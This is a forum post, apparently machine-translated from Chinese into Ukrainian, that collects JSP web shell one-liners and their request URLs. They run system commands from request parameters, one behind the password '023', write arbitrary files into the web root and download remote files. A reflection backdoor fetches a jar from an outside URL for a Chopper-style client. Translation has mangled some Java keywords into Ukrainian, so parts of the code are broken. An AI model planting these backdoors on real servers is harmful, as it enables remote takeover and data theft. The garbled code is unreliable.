|
|
Опубліковано 02.01.2015 18:46:57
|
|
|
|
Переведено з: http://p2j.cn/?p=1627
1. Виконуйте системні команди:
Виконуйте системні команди без відлуння:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
Запит: http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
Після виконання відлуння не буде, що дуже зручно для bounce shells.
Є відлуння при перевірці пароля:
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i"))).getInputStream(); int a = -1; байт[] b = новий байт[2048]; out.print("<pre>); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>); }%>
Запит: http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls
2. Закодуйте рядок і запишіть його у вказаний файл:
1:
<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes();%>
Запит: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Запис у веб-каталог:
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes();%>
Запит: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
2:
<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Запит: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Запис у веб-каталог:
<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Запит: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
3: Завантажте віддалений файл (якщо не використовувати утиліти Apache Io, не можна конвертувати вхідний потік у байт, тому він дуже довгий...)
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); байт[] b = новий байт[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; тоді як ((a = в.read(b)) != -1) { baos.write(b, 0, a); } новий java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
Запит: http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
Завантажити на веб-шлях:
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); байт[] b = новий байт[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; тоді як ((a = в.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
Запит: http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
Четверте: Відображення викликає зовнішню банку, ідеально задні двері
Якщо вам не подобається, що функція бекдора занадто слабка і застаріла, можете спробувати так:
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{ request.getParameterMap()})%>
Запит: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A
Підключення кухонного ножа: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar, пароль 023.
Рішення:
Використовуйте відображення для завантаження зовнішнього jar у поточний додаток, і відбиття виконує результат обробки вихідних. request.getParameterMap() містить усі запитувані параметри. Оскільки зовнішній jar-пакет завантажений, сервер повинен мати доступ до цієї jar-адреси. |
Попередній:Криза текстового файлу TXTНаступний:Шифрування Java MD5, шифрування Base64 та розшифрування Java виконує вихідний код команд системи
|
Опубліковано 02.01.2015 20:17:30
|
Орендодавець|
Опубліковано 02.01.2015 20:39:44
|
